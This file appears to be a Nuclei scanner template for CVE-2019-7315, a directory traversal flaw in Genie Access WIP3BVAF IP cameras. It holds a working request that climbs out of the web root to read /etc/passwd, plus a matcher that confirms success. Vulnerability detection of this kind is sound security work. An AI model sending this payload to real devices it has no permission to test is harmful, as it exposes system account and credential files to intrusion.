nuclei-templates/cves/2019/CVE-2019-7315.yaml

33 lines
974 B
YAML
Raw Normal View History

2022-06-23 08:31:47 +00:00
id: CVE-2019-7315
info:
name: Genie Access WIP3BVAF IP Camera - Directory Traversal
author: 0x_Akoko
severity: high
2022-06-23 08:35:59 +00:00
description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to directory traversal via the web interface, as demonstrated by reading /etc/shadow.
2022-06-23 08:31:47 +00:00
reference:
- https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/
2022-06-23 08:31:47 +00:00
- https://vuldb.com/?id.136593
- https://www.cvedetails.com/cve/CVE-2019-7315
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-06-23 08:31:47 +00:00
cvss-score: 7.5
cve-id: CVE-2019-7315
cwe-id: CWE-22
tags: cve,cve2019,camera,genie,lfi,iot
2022-06-23 08:31:47 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../etc/passwd"
2022-06-23 08:31:47 +00:00
matchers-condition: and
matchers:
- type: regex
2022-06-23 08:31:47 +00:00
part: body
regex:
- "root:.*:0:0:"
2022-06-23 08:31:47 +00:00
- type: status
status:
- 200